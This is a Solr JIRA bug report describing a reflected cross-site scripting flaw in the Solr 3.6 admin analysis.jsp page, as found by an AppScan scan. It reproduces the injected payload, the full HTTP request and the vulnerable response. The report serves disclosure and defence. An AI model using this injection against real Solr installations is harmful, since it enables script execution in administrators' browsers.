Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-4305

XSS vulnerability in Solr /admin/analysis.jsp

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Won't Fix
    • Affects Version/s: 3.6
    • Fix Version/s: None
    • Component/s: multicore
    • Labels:
    • Environment:

      Solaris

      Description

      This issue was found when running solr 3.6 in solaris, in a multicore setup. Each core had a cross site scripting vulnerability found at /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.

      Here are the details of the scan result as given by IBM Rational AppScan:

      [1 of 1] Cross-Site Scripting
      Severity: High
      Test Type: Application
      Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
      CVE ID(s): N/A
      CWE ID(s): 79 (parent of 83)
      Remediation Tasks: Review possible solutions for hazardous character injection
      Variant 1 of 6 [ID=19389]
      The following changes were applied to the original request:
      • Set parameter 'name's value to '" onMouseOver=alert(39846)//'
      Request/Response:
      12/10/2012 3:33:04 PM 16/187
      POST /solr/<core>/admin/analysis.jsp HTTP/1.1
      Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
      Content-Length: 96
      Accept: /
      Accept-Language: en-us
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
      Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
      Media Center PC 6.0; Tablet PC 2.0)
      Host: <server>:8443
      Content-Type: application/x-www-form-urlencoded
      Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
      nt=type&name=" onMouseOver=alert
      (39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
      HTTP/1.1 200 OK
      Content-Length: 1852
      Server: Apache-Coyote/1.1
      Content-Type: text/html;charset=utf-8
      Date: Mon, 10 Dec 2012 15:54:38 GMT
      <html>
      <head>
      <script>
      var host_name="<server>"
      </script>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <link rel="stylesheet" type="text/css" href="solr-admin.css">
      <link rel="icon" href="favicon.ico" type="image/ico"></link>
      <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
      <title>Solr admin page</title>
      </head>
      <body>
      <a href="."><img border="0" align="right" height="78" width="142"
      src="solr_small.png" alt="Solr"></a>
      <h1>Solr Admin (Cares)
      </h1>
      <server><br/>
      cwd=/export/home/kh SolrHome=/solr/<core>/
      <br/>
      12/10/2012 3:33:04 PM 17/187
      HTTP caching is ON
      <br clear="all">
      <h2>Field Analysis</h2>
      <form method="POST" action="analysis.jsp" accept-charset="UTF-8">
      <table>
      <tr>
      <td>
      <strong>Field
      <select name="nt">
      <option >name</option>
      <option selected="selected">type</option>
      </select></strong>
      </td>
      <td>
      <input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
      </td>
      </tr>
      <tr>
      <td>
      <strong>Field value (Index)</strong>
      <br/>
      verbose output
      <input name="verbose" type="checkbox"
      checked="true" >
      <br/>
      highlight matches
      <input name="highlight" type="checkbox"
      checked="true" >
      </td>
      <td>
      <textarea class="std" rows="8" cols="70" name="val">1234</textarea>
      </td>
      </tr>
      <tr>
      <td>
      <strong>Field value (Query)</strong>
      <br/>
      verbose output
      <input name="qverbose" type="checkbox"
      checked="true" >
      </td>
      <td>
      <textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
      </td>
      </tr>
      <tr>
      <td>
      </td>
      <td>
      <input class="stdbutton" type="submit" value="analyze">
      </td>
      </tr>
      </table>
      </form>
      <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
      </body>
      </html>
      12/10/2012 3:33:04 PM 18/187
      Validation In Response:
      • option>
      <option selected="selected">type</option>
      </select></strong>
      </td>
      <td>
      <input class="std" name="name" type="text" value="" onMouseOver=alert
      (39846)//">
      </td>
      </tr>
      <tr>
      <td>
      <strong>Field value (Index)</strong>
      <br/>
      verbose output
      <inp
      Reasoning:
      The test successfully embedded a script in the response, which will be executed once the user
      activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
      control). This means that the application is vulnerable to Cross-Site Scripting attacks.
      CWE ID:
      83 (child of 79)
      Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
      Total of 1 security issues in this URL

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              rbjbrooks Rob Brooks
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: